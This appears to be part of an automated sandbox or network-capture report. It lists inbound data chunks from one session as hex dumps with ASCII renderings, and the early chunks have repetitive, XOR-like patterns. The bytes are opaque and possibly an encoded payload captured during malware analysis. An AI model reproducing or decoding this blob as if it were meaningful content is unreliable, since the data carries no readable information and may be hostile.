2023-01-12 11:11:41 UTC	336	IN	Data Raw: 73 07 86 7a 75 72 64 6d 70 6e 71 70 2d 74 67 64 80 6b 16 cb 69 6a 75 6b 44 7a 48 2a e3 72 93 60 73 6e 77 68 72 74 33 66 0c 39 55 1c 9d 67 f5 d9 57 62 71 77 63 72 e9 e4 3b 0b 8f 65 71 74 75 66 74 66 64 61 36 6a 67 69 ad 6f fd c5 76 72 64 6d 63 76 4e 35 e7 74 8c 6b 77 66 62 79 69 6a 33 6b 2f 3d 10 12 8c 7f fc df 70 6e 77 68 67 74 f8 ef 1d 03 9b 74 6a 6a 75 6b 57 62 77 6f 29 72 76 6f 8a 63 df da 72 74 75 66 67 7e 5b 24 fc 6a 8c 66 54 62 71 77 76 72 22 6d 08 31 0c 0d 88 79 c1 d4 74 66 62 79 7c 6a f8 e2 d1 07 8b 7a 75 72 64 6d 70 6e 71 70 2d 74 67 64 8c 6b a2 cb 69 6a 75 6b 44 7a 48 2a e3 72 9f 60 73 6e 77 68 72 74 33 66 0c 39 19 1c 91 67 b9 d9 57 62 71 77 63 72 e9 e4 e4 0b 8b 65 71 74 75 66 74 66 64 61 36 6a 67 69 a9 6f a9 c5 76 72 64 6d 63 76 4e 35 e7 74 88 Data Ascii: szurdmpnqp-tgdkijukDzHr`snwhrt3f9UgWbqwcr;eqtuftfda6jgiovrdmcvN5tkwfbyij3k/=pnwhgttjjukWbwo)rvocrtufg~[$jfTbqwvr"m1ytfby\|jzurdmpnqp-tgdkijukDzHr`snwhrt3f9gWbqwcreqtuftfda6jgiovrdmcvN5t
2023-01-12 11:11:41 UTC	352	IN	Data Raw: 77 66 63 79 99 6b 75 6b 55 62 82 76 75 72 65 6d 80 6f 77 68 70 74 86 67 77 66 63 79 99 6b 75 6b 55 62 82 76 75 72 66 6d c6 6c 77 68 70 74 86 67 77 66 63 79 99 6b 75 6b 55 62 82 76 75 72 65 6d 80 6f 77 68 73 74 c0 64 77 66 63 79 99 6b 75 6b 56 62 c4 75 75 72 65 6d 80 6f 77 68 70 74 86 67 77 66 63 79 99 6b 75 6b 55 62 82 76 75 72 65 6d 80 6f 77 68 70 74 86 67 77 66 63 79 99 6b 75 6b 56 62 c4 75 75 72 67 6d 42 6d 77 68 70 74 86 67 77 66 60 79 df 68 75 6b 57 62 40 74 75 72 60 6d 40 6d 77 68 74 74 45 62 77 66 63 79 99 6b 75 6b 55 62 82 76 75 72 65 6d 80 6f 77 68 70 74 86 67 77 66 63 79 99 6b 75 6b 55 62 82 76 75 72 65 6d 80 6f 77 68 70 74 86 67 77 66 60 79 df 68 75 6b 57 62 40 74 75 72 65 6d 80 6f 77 68 70 74 86 67 77 66 63 79 99 6b 75 6b 56 62 c4 75 75 72 65 Data Ascii: wfcykukUbvuremowhptgwfcykukUbvurfmlwhptgwfcykukUbvuremowhstdwfcykukVbuuremowhptgwfcykukUbvuremowhptgwfcykukVbuurgmBmwhptgwf`yhukWb@tur`m@mwhttEbwfcykukUbvuremowhptgwfcykukUbvuremowhptgwf`yhukWb@turemowhptgwfcykukVbuure
2023-01-12 11:11:41 UTC	368	IN	Data Raw: 80 6f 77 68 72 74 c0 64 77 66 60 79 99 6b 75 6b 57 62 c4 75 75 72 66 6d 80 6f 77 68 73 74 86 67 77 66 60 79 99 6b 75 6b 56 62 82 76 75 72 65 6d 80 6f 77 68 70 74 86 67 77 66 60 79 99 6b 75 6b 57 62 c4 75 75 72 66 6d 80 6f 77 68 72 74 c0 64 77 66 60 79 99 6b 75 6b 56 62 82 76 75 72 65 6d 80 6f 77 68 73 74 c0 64 77 66 63 79 99 6b 75 6b 56 62 c4 75 75 72 65 6d 80 6f 77 68 73 74 c0 64 77 66 61 79 5b 69 75 6b 50 62 42 74 75 72 65 6d 80 6f 77 68 73 74 c0 64 77 66 61 79 5b 69 75 6b 50 62 42 74 75 72 65 6d 80 6f 77 68 73 74 c0 64 77 66 61 79 5b 69 75 6b 50 62 42 74 75 72 65 6d 80 6f 77 68 73 74 c0 64 77 66 61 79 5b 69 75 6b 50 62 42 74 75 72 66 6d 80 6f 77 68 73 74 86 67 77 66 63 79 99 6b 75 6b 55 62 82 76 75 72 65 6d 80 6f 77 68 73 74 c0 64 77 66 63 79 99 6b 75 Data Ascii: owhrtdwf`ykukWbuurfmowhstgwf`ykukVbvuremowhptgwf`ykukWbuurfmowhrtdwf`ykukVbvuremowhstdwfcykukVbuuremowhstdwfay[iukPbBturemowhstdwfay[iukPbBturemowhstdwfay[iukPbBturemowhstdwfay[iukPbBturfmowhstgwfcykukUbvuremowhstdwfcyku
2023-01-12 11:11:41 UTC	384	IN	Data Raw: 31 04 45 1a 1d 43 0d 06 3b 38 1f 68 33 4c 42 3c 40 05 37 10 3b 29 1f 38 17 2f 05 21 21 4a 1d 6d 1e 56 12 25 46 31 20 2c 11 0b 2a 41 3b 53 3c 03 32 0e 07 77 30 41 0a 54 19 2d 22 04 12 03 3d 20 03 31 16 17 21 05 32 6b 1f 2b 03 13 44 42 31 5e 32 08 10 27 10 11 1f 2b 43 09 0e 79 07 09 17 3d 03 14 24 35 3a 13 0d 05 16 5b 21 18 29 35 10 66 11 2b 10 49 13 0b 34 3f 22 29 08 36 45 44 32 5a 26 0b 3c 68 34 42 33 08 05 32 23 38 3e 2c 0c 3b 62 2b 40 1c 2d 10 22 6d 3d 3d 32 0b 27 24 34 35 25 5e 04 48 1f 20 1e 5d 1c 55 14 77 10 45 30 37 1a 25 36 03 13 1f 41 13 22 25 30 36 09 03 3b 6b 3e 11 43 14 33 1e 25 00 1d 06 00 21 09 2d 20 29 22 1f 54 79 0e 0f 05 00 0e 55 30 07 40 26 14 01 40 0a 26 23 47 10 27 66 22 2d 27 35 5a 5f 34 28 3b 01 3e 21 1f 43 2f 15 3e 1d 40 68 15 1d 37 Data Ascii: 1EC;8h3LB<@7;)8/!!JmV%F1 ,*A;S<2w0AT-"= 1!2k+DB1^2'+Cy=$5:[!)5f+I4?")6ED2Z&<h4B32#8>,;b+@-"m==2'$45%^H ]UwE07%6A"%06;k>C3%!- )"TyU0@&@&#G'f"-'5Z_4(;>!C/>@h7
2023-01-12 11:11:41 UTC	400	IN	Data Raw: 27 0d 1a 37 0c 5c 03 6b 00 53 3c 20 39 2a 23 1a 24 57 23 3a 39 1d 2f 51 2d 57 56 79 20 5e 17 0e 10 28 36 25 33 01 21 02 02 38 16 2a 3a 27 0d 66 26 21 06 49 39 26 32 27 39 05 04 1e 42 13 0f 5c 23 0f 02 68 0b 10 24 3e 10 16 25 00 12 26 25 23 2c 37 1c 19 45 3c 30 6d 36 37 35 1e 22 2e 32 28 43 14 30 35 18 28 4d 18 22 10 1e 77 05 40 12 05 3f 05 30 2e 00 20 1d 2b 1f 11 15 13 58 1c 3e 6b 0c 12 25 20 18 3e 23 2a 3b 06 21 2a 00 1e 3b 10 3f 21 05 79 28 25 3a 3a 0d 2a 36 16 30 0a 51 08 14 1f 38 32 49 37 40 66 1a 23 20 20 25 3a 32 32 26 24 15 32 02 42 26 2e 01 2d 31 68 37 02 19 09 3d 51 25 30 5b 1b 13 05 32 32 20 43 07 46 05 6d 16 0f 0f 58 29 05 32 29 12 1e 0b 49 53 0c 20 06 39 30 04 77 05 3c 0d 59 17 26 30 5c 46 4d 19 15 10 25 20 3f 5e 2c 34 6b 06 25 24 22 34 33 23 Data Ascii: '7\kS< 9#$W#:9/Q-WVy ^(6%3!8:'f&!I9&2'9B\#h$>%&%#,7E<0m675".2(C05(M"w@?0. +X>k% >#;!;?!y(%::*60Q82I7@f# %:22&$2B&.-1h7=Q%0[22 CFmX)2)IS 90w<Y&0\FM% ?^,4k%$"43#
2023-01-12 11:11:41 UTC	416	IN	Data Raw: 39 0c 45 68 18 02 1c 5e 26 22 55 2d 53 2c 75 28 2d 05 49 33 3c 15 0b 2e 32 6e 39 59 45 4c 12 08 10 0e 37 2d 6a 07 00 39 6c 08 15 3a 19 04 00 6d 37 1c 45 50 03 07 1c 31 3f 08 62 29 26 01 4d 3c 1b 0c 46 1b 1b 72 1e 59 41 56 12 3d 3a 02 04 36 77 17 32 16 52 5f 43 25 39 50 12 77 02 20 52 55 02 57 4e 51 42 01 75 32 18 23 5a 16 27 02 33 0f 6c 62 29 05 39 4a 3c 14 24 24 13 04 71 22 1a 55 4f 51 1a 15 3e 3d 39 6b 3f 33 39 4f 23 3e 36 35 1a 5a 77 10 35 1c 4d 00 2e 05 23 1f 3d 6a 07 3a 32 5a 21 05 24 07 25 18 73 24 1a 1f 49 17 26 08 0e 11 09 79 23 08 41 53 21 57 26 25 44 47 64 09 02 3e 4f 25 19 10 00 27 06 66 32 0b 05 09 10 18 27 2f 1e 13 00 1e 01 6d 07 37 25 50 43 3d 1b 2b 2e 11 62 11 3c 5d 4d 31 33 0e 37 3a 45 72 1d 5b 46 56 32 31 03 11 3a 0d 77 05 34 2f 52 53 30 Data Ascii: 9Eh^&"U-S,u(-I3<.2n9YEL7-j9l:m7EP1?b)&M<FrYAV=:6w2R_C%9Pw RUWNQBu2#Z'3lb)9J<$$q"UOQ>=9k?39O#>65Zw5M.#=j:2Z!$%s$I&y#AS!W&%DGd>O%'f2'/m7%PC=+.b<]M137:Er[FV21:w4/RS0
2023-01-12 11:11:41 UTC	432	IN	Data Raw: d4 b7 7f 7f 7d 7a 6c 70 76 73 72 60 79 7c 7d 7b 72 73 70 65 6b 62 68 68 5c 67 79 6a 70 75 79 68 75 6b 7f 61 79 72 7d 7b 74 63 70 f9 b7 62 68 6e 41 70 f1 a6 77 7a 6a 7f f3 b3 72 7d 63 f4 a4 64 7f 68 6a 7b 62 62 77 61 46 e2 90 7f 67 37 6c 68 7b 60 75 6a 73 7c 73 73 65 e7 de 78 62 62 55 6b 41 70 6d 76 66 72 61 78 61 72 76 60 74 54 74 67 6a 65 65 59 68 6b 66 6b 47 63 79 77 74 60 e4 8c 61 ee aa 6d 76 75 67 e6 96 61 62 78 77 6f 67 eb b5 66 76 76 68 77 6c 6d 70 6f 6a 6d 79 69 70 6f 70 61 6a 71 62 62 7d 63 5c 67 51 76 74 60 21 69 53 6e 65 2d 75 73 74 74 32 63 42 78 77 6f 7d 63 53 66 6c 72 7d 7a 79 68 77 68 65 e8 ac 72 75 67 75 74 e2 b4 62 6a 74 79 d4 af 63 f7 b8 7f 64 6c 66 7c f7 81 70 65 f6 92 65 e6 af 69 6d 69 60 79 d4 8b 70 66 f6 86 76 ed be 7f f4 9c 79 61 67 Data Ascii: }zlpvsr`y\|}{rspekbhh\gyjpuyhukayr}{tcpbhnApwzjr}cdhj{bbwaFg7lh{`ujs\|ssexbbUkApmvfraxarv`tTtgjeeYhkfkGcywt`amvugabxwogfvvhwlmpojmyipopajqbb}c\gQvt`!iSne-ustt2cBxwo}cSflr}zyhwherugutbjtycdlf\|peeimi`ypfvyag
2023-01-12 11:11:41 UTC	448	IN	Data Raw: 65 ec 0a 7d 6c 78 ff 07 5e 62 72 76 69 60 e5 08 61 e4 1b 6c 77 66 ff 16 71 46 63 6b eb 2e 69 62 54 60 63 f6 31 6e 76 e7 03 6a 71 7a fb 00 7f 66 74 67 7e 6b eb 2e 67 e1 20 66 77 65 ff 0a 6c 4d 71 6f 67 79 f3 7c 7d 6d 77 65 63 69 7b e8 7d 63 46 e8 09 73 73 60 ee 11 79 4e 75 6a 61 65 f7 6e 66 e4 6a 74 6a 69 77 7b 45 e0 79 66 f7 7a 76 e7 0f 6a 71 7a fb f4 72 46 76 6e 72 68 e8 62 7f 6b 56 6a 61 66 f7 7a 76 e7 f3 6a 71 7a fb f0 7c 46 75 64 73 fb 62 7b f7 63 58 62 72 75 64 f0 6c 7c f1 66 65 e2 f5 70 73 74 fd ee 67 59 6b 62 65 63 5c 62 73 7f 65 7a 76 e7 fb 6a 71 7a fb f8 70 46 76 68 72 71 62 6a 77 65 44 6a 63 fd f9 76 62 7f f9 fe 70 68 73 68 69 74 fd f6 66 7f 78 e0 e1 6c 54 60 79 6b 67 f8 f0 69 75 7c fd f0 7a 74 70 67 6b 7b 67 71 62 78 ff f3 50 64 63 fd e9 78 64 Data Ascii: e}lx^brvi`alwfqFck.ibT`c1nvjqzftg~k.g fwelMqogy\|}mweci{}cFss`yNujaenfjtjiw{EyfzvjqzrFvnrhbkVjafzvjqz\|Fudsb{cXbrudl\|fepstgYkbec\bsezvjqzpFvhrqbjweDjcvbphshitfxlT`ykgiu\|ztpgk{gqbxPdcxd
2023-01-12 11:11:41 UTC	464	IN	Data Raw: 4b 35 0c 1f 58 a8 47 d6 cd b8 e8 b4 9c 0d c3 62 a1 bf e2 23 d2 1e c5 12 80 ba c9 8f 6d 12 4c 9e ee f6 c1 15 40 e9 0b d8 80 6e de 9e ee c7 69 0c ca db 85 cd 3b 6d fd 5d 7a 4a e6 19 08 e9 ab 9a f5 18 b8 9e 7c 24 1a 52 79 7b 2c 4d 5b 57 fc ad c3 e3 2f d5 81 29 db a6 36 46 65 71 69 d2 ea c6 43 76 c0 81 98 50 ac 0b 14 6e 15 b0 9a 1f 0c 0e 97 78 7d a0 2b 22 01 3b d9 16 ac 47 6a 80 cd 14 24 69 93 71 1d 94 4d 65 5a d3 75 bf ba e7 a8 0e 8e 82 01 6e 26 f6 60 aa 19 83 df a1 81 e7 22 1b 84 07 66 71 83 6d ad 8b ba c4 41 0b a1 f6 d2 1b 93 67 ad b6 61 9d 6f af 9b 13 ea 99 9f 74 b2 a5 6b 0b 67 fb 0e 69 36 9d 6d 81 bc ed eb 74 c9 4d 24 1e c3 3b 4d 69 9a 2e ef ee c2 8a 7b de 63 0e c2 b1 b7 75 5f 40 22 2c 53 ad fa 7f 51 41 eb a5 a7 2f 23 c5 9f 11 07 fa a5 dd 94 d0 00 12 2c Data Ascii: K5XGb#mL@ni;m]zJ\|$Ry{,M[W/)6FeqiCvPnx}+";Gj$iqMeZun&`"fqmAgaotkgi6mtM$;Mi.{cu_@",SQA/#,
2023-01-12 11:11:41 UTC	480	IN	Data Raw: 19 3c 5c c4 f6 db ab 49 1a f6 01 7f 98 14 5f 10 88 65 ed ed 35 1d 91 42 9a c7 1c a0 51 ac 11 bc 19 45 3a fe 95 98 ce 6b 7b 88 35 49 a1 67 3c 83 f4 34 14 cf 48 b6 75 25 23 d9 18 da b2 c9 d5 a2 4a d1 f7 b5 be 3d 5e 12 33 e1 bf b0 15 44 27 36 78 ed f6 03 27 96 40 b1 a5 ec 29 53 5a b7 93 d8 2a 50 fe 08 b0 68 81 5e 8b 42 b4 2c 48 ef 26 a4 45 08 a2 63 6e 81 15 9c 98 a3 47 c5 43 fa dd 25 b6 75 c5 83 95 ce 01 77 77 2d b8 bb 91 25 79 2b 2b e2 77 96 01 56 2d ef a2 99 1d ac 2f e8 df 03 9b 63 1a 97 5f 3b 8b 05 ea 9b e6 9c ad 0c ba 65 f5 99 96 f1 8a e5 19 04 7b 1c 9e 8d bc ff 0f 3b 03 fd c7 62 06 7a c4 de d3 9f 39 02 5c b2 a7 1c 2e 27 98 43 a4 41 06 02 88 62 aa cc 7d 5f d9 69 a5 98 ad 42 f5 1a 55 da 7f 22 63 88 a3 54 72 88 1d 53 ab f4 6e 2a 43 04 60 64 df 2f 62 5f 43 Data Ascii: <\I_e5BQE:k{5Ig<4Hu%#J=^3D'6x'@)SZPh^B,H&EcnGC%uww-%y++wV-/c_;e{;bz9\.'CAb}_iBU"cTrSnC`d/b_C
2023-01-12 11:11:41 UTC	496	IN	Data Raw: 03 07 de e9 83 cf 3e f0 b3 c0 94 e7 2e 81 94 b2 19 66 57 f8 c4 95 58 89 5a 74 db e2 e9 dc 2c 64 fb 06 be 0d a1 aa b4 11 4b 67 cc 74 f7 b3 e6 4e 2e 59 8c 45 28 90 e0 b2 5f 47 63 9e d1 55 00 e9 98 9b 75 38 24 9e c1 51 1b 92 f4 a3 b3 03 ce a7 41 ea 1e fb 88 52 4d f8 5a bd 0f 1c 2f ac 41 16 67 57 0f 1a 04 d0 25 ea b8 51 5c 6c 92 b7 1b 9d 44 81 b0 0f 6a 86 30 c7 30 fd 82 78 08 6b 84 81 92 4f 41 61 81 0c 62 d5 fd 3c 25 27 63 b1 2c 28 29 0c 54 52 22 82 7c 04 8c d4 c3 0f 23 e8 a1 b0 24 5e a1 54 c2 4a 54 45 76 00 90 6c 83 fe 72 83 d8 0c 90 d0 f7 c2 32 37 3b 94 5e e3 64 57 4d ee 69 6a 4c 27 31 3e 2d 18 df 17 61 d6 76 d1 83 48 b1 be 9f 8d 1f ae d9 94 62 20 44 47 ee 8a 4c e9 2e 0f 92 8e 60 cb c7 2d 9f ec 21 31 7b 21 4a 9a 04 ad f2 27 84 94 f4 59 a5 a6 7b 52 fe 5e 5f Data Ascii: >.fWXZt,dKgtN.YE(_GcUu8$QARMZ/AgW%Q\lDj00xkOAab<%'c,()TR"\|#$^TJTEvlr27;^dWMijL'1>-avHb DGL.`-!1{!J'Y{R^_
2023-01-12 11:11:41 UTC	512	IN	Data Raw: b8 3e 59 91 79 07 73 ad a8 45 e9 fd 88 d5 e2 a0 eb 3a ea d7 59 3f 56 78 5b 83 3f f0 4e 25 73 ec 7a f2 90 df d5 d2 f8 d0 ba e8 23 2d 4d 2a 22 78 37 63 cd 35 30 22 eb 7f e7 19 f6 75 c3 ba 43 2a 53 71 55 b2 c3 c6 d4 8f b1 91 cb 26 89 92 ee 3c 10 d4 99 7d 69 f6 df d1 a6 cf c7 e1 60 60 a6 89 91 04 33 fc 7d b4 bd 96 b4 64 65 34 e5 dd 7e 0e c1 14 ec a1 bb fe 56 1a d2 1c 9b 0a 63 ca 62 b2 45 f1 25 95 06 f6 29 8e de 73 a0 03 d2 6a be 4e 77 69 ae da 43 f3 49 fa d7 a7 f1 38 77 7e 37 e6 c9 36 c9 b2 4f c1 79 3a a9 0c fb 33 fe ab 13 a0 7e 42 61 e6 91 f8 66 19 47 02 7c 51 04 fe 1e 3f f6 67 dd ed 40 e9 57 e1 8c c6 b1 71 53 18 1d 08 1b 5f 28 64 77 8f 4d df a6 c5 0d c4 06 06 0b 88 61 cf 3c 04 bc 03 96 0e ab 0c a7 97 0a 30 d4 97 d6 bc 70 9d 04 2d 6f e0 9a 6b d4 40 4d d5 1e Data Ascii: >YysE:Y?Vx[?N%sz#-M"x7c50"uCSqU&<}i``3}de4~VcbE%)sjNwiCI8w~76Oy:3~BafG\|Q?g@WqS_(dwMa<0p-ok@M
2023-01-12 11:11:41 UTC	528	IN	Data Raw: 66 3d 87 3e 1b b3 03 25 c1 b9 bc 24 85 c2 6c 5b 4d 03 d4 64 76 e1 c8 47 79 a1 ff d0 a2 a1 aa 36 28 26 dd c7 60 5b b2 55 1e 16 f6 e5 ce d3 8d c1 40 86 67 1c 5b 34 70 ab 3d 1b 37 d1 f6 c2 2a ea b0 ce cd 84 24 5f e5 ac 14 59 9d 39 f9 a7 87 f6 d2 3f 29 80 bc 2f 65 35 44 df 97 e2 6c ae d4 eb 90 cf 5d 48 34 b4 01 44 22 b0 97 90 46 f0 51 20 d4 84 b1 b8 81 93 f4 72 33 ed 6d 80 80 0b 4a 7d ca 6b 67 9e cc 15 07 a2 0f d5 e9 ee e3 18 43 64 cd b5 a7 7a 8e 0b ad 44 6c a2 a8 77 75 b8 ac 4e fd 76 46 d9 df 15 26 f0 ba 61 0b 4d 11 85 ab 73 23 a6 97 f5 f9 e9 f6 cf 7e 72 dd f4 5e ab b1 86 a6 b3 85 e2 c2 d8 dd 0f 2c a3 65 ce 5e c7 34 c6 b2 57 05 06 67 b4 a8 3f 2d 14 13 d9 92 46 9c d2 08 6d 93 80 00 59 fa f4 6c 42 4a 1e 6f 99 94 b8 9c a6 36 01 07 ab e7 3d fc 2a f1 e2 35 53 1e Data Ascii: f=>%$l[MdvGy6(&`[U@g[4p=7$_Y9?)/e5Dl]H4D"FQ r3mJ}kgCdzDlwuNvF&aMs#~r^,e^4Wg?-FmYlBJo6=5S
2023-01-12 11:11:41 UTC	544	IN	Data Raw: d0 5e 86 9e 9a fa a3 62 ba a2 c7 da b0 ea 5a 6a 58 44 f0 76 df b8 96 81 4d 6c 76 c4 e9 33 85 af 2c 22 89 47 0d 80 29 db d5 f9 af 5a c9 68 e0 a4 26 67 2a bc c6 13 57 20 1f 8f 8b 56 ea 2c 90 33 e5 50 59 74 e2 40 91 ee 58 cd b6 25 c0 c7 18 7a c8 79 bb bc 50 14 af 07 ec e9 a9 59 4b 7e 2e 31 9f dc ff 52 c0 af 96 76 f1 3b d5 03 8f ca c7 2c 81 3f 70 e3 09 f5 29 4b b5 14 3b 34 b6 a5 ea 0e 0e 62 14 af 85 e4 de 8b 69 d4 d0 c5 dc 57 3a 06 50 c4 ef 46 ec dc 5f 24 28 86 0f e1 cd 38 5e 2a 30 fe 7c 0c 60 27 04 1f 2b c2 bf cd 46 cb 40 f7 aa 44 d5 e1 42 d3 02 6a 67 e8 a1 b0 58 0b 3f 05 4d 14 ed dc f9 14 78 72 0d 0a 39 39 9f 97 43 90 c0 c0 71 4f 87 91 21 78 b6 97 a4 9d 71 f8 c7 d7 29 71 fd 3c a8 b0 2e 32 08 b5 d2 c1 ad bc 44 1f cc 1c b3 6f 43 d3 9f a1 42 c7 d8 1c 0e 69 30 Data Ascii: ^bZjXDvMlv3,"G)Zh&gW V,3PYt@X%zyPYK~.1Rv;,?p)K;4biW:PF_$(8^0\|`'+F@DBjgX?Mxr99CqO!xq)q<.2DoCBi0
2023-01-12 11:11:41 UTC	560	IN	Data Raw: 02 00 97 6e 7f 82 2e 19 0b 76 fb 65 03 e5 89 f6 6a 0a 60 fc 24 8a 48 82 11 a5 59 70 b6 e7 c9 fa a2 ae 45 6f c1 b1 1e 89 a1 03 be f0 b2 16 8b e6 bc 52 48 d9 73 bd 1b 4c 19 1f c6 f7 cc 76 22 92 66 34 d0 dd 71 43 7c 92 48 32 09 48 ce 10 57 ee 88 a5 9f 94 6f 50 8c e4 a9 20 03 fd d8 0e 95 b0 50 6c ff dd 6c 1b a5 61 97 60 d6 a4 30 9a 0c 94 0a 67 39 d6 1b 73 93 d6 2b 47 0e d3 9e 38 43 5a 58 c2 0c b3 bf 36 eb 80 a4 17 2d e0 4d c2 f2 96 f6 81 07 82 5a 48 cc 9f fe e8 1a f6 98 cc 13 b5 97 e7 4f a2 43 c1 63 25 b3 c3 15 0a ee 9b 2e 5e 22 50 93 6a 17 b1 c8 7d 8b 8c a4 7c 45 05 13 71 05 95 5e 40 56 8c 29 6e f1 4a fb 73 d4 9f 1c fc d8 41 32 ba a3 ea cf bd 82 22 d2 a1 d5 2d 08 d5 c5 3e 49 8e c6 8d 2d 18 3c 13 25 70 0f f4 f4 b5 c5 83 a0 59 79 c2 76 a9 81 2e 2f 8f 2c 00 18 Data Ascii: n.vej`$HYpEoRHsLv"f4qC\|H2HWoP Plla`0g9s+G8CZX6-MZHOCc%.^"Pj}\|Eq^@V)nJsA2"->I-<%pYyv./,
2023-01-12 11:11:41 UTC	576	IN	Data Raw: 9e 96 97 fe c1 da 42 bb 65 10 24 2e f3 93 d7 20 d0 6f 4f 33 cf 30 d7 89 1c 63 56 55 ed 2a db f3 b5 63 14 0a 22 86 35 a8 7b a2 d5 5b 91 cd 67 f2 38 99 f2 4b 3b 5e fb 13 44 30 57 fc 72 3d 50 f6 d2 f8 bb f0 aa fa 98 91 c7 6b 31 ea 09 41 e6 e4 3f 2c 62 89 49 d1 c5 5d 4e d8 38 77 51 d7 f7 44 a6 28 25 5c b5 dd 79 ad 27 0f b0 34 2b f8 69 95 c7 94 36 44 7b 70 c5 25 d2 9c 6e 41 4d ea 02 e5 e6 e1 eb 77 89 5f 88 fa 8f 8c d4 74 4c 43 e0 8d 1b 61 4f 6e a7 f1 b7 db 83 aa 61 fd 7b 63 2c e6 57 b0 25 6a 4f 11 4f a6 e6 b8 d3 de bd 51 3a 6d 2d dc d7 b6 8e 89 12 f1 c2 8c a6 b7 36 3b c8 48 58 db b7 fc 02 34 e1 67 5a 77 48 e5 26 03 1f 88 fa 24 f3 c7 a3 f8 ab ad 62 c6 81 d7 04 f4 91 34 5c 4f 0b 19 f7 b2 03 68 d3 e2 a5 fe fd 55 88 71 40 65 07 a8 f1 37 81 50 e4 18 70 5a 9b 98 b3 Data Ascii: Be$. oO30cVU*c"5{[g8K;^D0Wr=Pk1A?,bI]N8wQD(%\y'4+i6D{p%nAMw_tLCaOna{c,W%jOOQ:m-6;HX4gZwH&$b4\OhUq@e7PpZ
2023-01-12 11:11:41 UTC	592	IN	Data Raw: 1f cf 30 34 a5 b7 e9 ac c0 b9 c4 fa 1e e6 41 2a 86 62 ae 1d dc ff 34 87 fa 35 1e 30 30 5e a9 77 dc 86 b9 18 60 02 84 68 a5 d4 eb f0 3a 71 8c 1f 24 d8 b9 6b b3 28 15 ea 11 e5 9e 77 83 ab 26 df 95 6a 03 78 0e 85 75 4e 5c c0 d6 6e e5 1e f2 29 62 0b a7 11 11 1f ec 5f 2b 67 6c b2 d3 1e 3c 9f 40 45 c6 77 53 c9 aa 01 65 59 2b 6d dc 24 7a c4 a8 77 aa f6 45 2c cf 17 71 6f 32 98 d0 d6 e2 81 8a ec 23 c9 18 41 82 83 18 57 64 60 91 a0 1d 97 f4 aa da 12 21 d9 08 c6 a3 40 aa 93 d3 1b 89 fb fd 18 5e 56 48 2e 6a 9e f4 2d d3 8b 3a 3c 1c 52 8b 82 da 44 5a 47 04 6f 02 5e c8 17 8c a4 f8 19 5a e6 47 8b 5b 84 86 d3 67 8c d6 9a 11 d1 f6 6d d6 a3 a6 74 42 c7 00 38 aa 8a 8c 85 4d 88 32 d1 67 24 31 fb 36 56 f4 c5 2d 19 b6 6a 8f 5f 7a fc 81 b5 c0 65 61 70 84 6f b8 77 f7 9c 00 77 52 Data Ascii: 04A*b4500^w`h:q$k(w&jxuN\n)b_+gl<@EwSeY+m$zwE,qo2#AWd`!@^VH.j-:<RDZGo^ZG[gmtB8M2g$16V-j_zeapowwR
2023-01-12 11:11:41 UTC	608	IN	Data Raw: 75 9d dd 21 60 ab 14 2b b8 85 20 fd 30 5e 85 d5 6b ce 73 f9 82 19 46 94 dd 2f 4a 74 be 64 2b 15 08 b6 77 b0 c5 6e ab 90 d4 6d 07 25 1d 60 f0 6a 6f c2 1b d8 2f 66 59 e3 48 82 a0 7a 5a a0 3e 72 7f c3 6a 97 23 24 72 58 41 2d 3d 68 59 e7 9b bc 02 b1 c3 0c e3 9a 22 ef 15 9e 88 04 f2 c0 ea 57 e9 80 51 03 85 58 29 50 28 4f d5 24 07 8f 6a 37 a7 c4 4d b6 77 f5 31 e2 39 3a 27 16 6f ab 7e 9b 1b 35 42 9c 43 f1 5d 0f 82 0b 5e b1 ec 04 2c 87 f8 98 5c 34 f1 f6 d6 42 e4 6b e5 b5 c5 88 4c bf c9 3b 27 81 d9 b5 18 8a 93 ff 4d fa d9 3c a5 ab 0f 6b b4 d4 e0 d5 95 4d ee 06 b6 83 cb a9 25 2c ed 9c 84 69 ae f7 73 d4 90 f8 f2 2b 15 29 5c e6 ff ff b8 3a 6d c4 7b 4f b9 09 b4 99 3f 6f b5 fc c5 2c c1 db f6 38 c4 51 16 19 d1 35 fd f9 c2 65 33 38 fd 25 e9 47 a7 d7 65 e3 08 10 7e 8c db Data Ascii: u!`+ 0^ksF/Jtd+wnm%`jo/fYHzZ>rj#$rXA-=hY"WQX)P(O$j7Mw19:'o~5BC]^,\4BkL;'M<kM%,is+)\:m{O?o,8Q5e38%Ge~
2023-01-12 11:11:41 UTC	624	IN	Data Raw: 7f 9e e3 e9 34 db eb cd 76 40 0a 19 b7 fe f9 2b 68 a4 4d 9a a3 ea ad fc 55 72 10 51 ef 6f 0c f7 33 83 9e 56 28 3c 7a bb 42 35 99 d9 aa 9d cd e4 04 5f b5 01 95 40 48 98 5f 8d c0 4d 89 76 ba 41 d0 86 94 b2 e0 76 fe 42 d0 15 8d 8c f7 f8 54 d4 ee a7 75 dc b4 8d e6 2b 39 de 9d e5 eb 94 50 f9 24 e1 e6 ed e8 c0 64 bf 49 52 9b 7a 7b 1b 64 31 33 ab 72 58 77 98 49 fd 23 55 e3 8b 6f 98 9a 11 b4 58 12 99 45 9f 9f 91 9e 33 61 62 52 79 84 06 d5 9b 06 36 68 33 6a 71 72 9b e0 14 36 72 0c 60 c4 f0 25 ee e8 1f 7c 0d f1 b1 bb b1 0c f0 a0 0a 19 3c db ed 2a 03 1f 07 73 10 b2 3c 51 33 fd 06 6c f1 17 a4 d1 b8 d1 87 13 b5 e4 55 86 96 b5 ce 42 ef 96 dd c4 de a0 9f 10 5e 32 ca bb 2e 5c 6c 65 69 1b 5a f6 e9 4b 89 11 e2 e5 c3 af 37 13 c5 73 d8 85 5d 6c f2 20 fb 9c 57 4d a6 80 64 e5 Data Ascii: 4v@+hMUrQo3V(<zB5_@H_MvAvBTu+9P$dIRz{d13rXwI#UoXE3abRy6h3jqr6r`%\|<*s<Q3lUB^2.\leiZK7s]l WMd
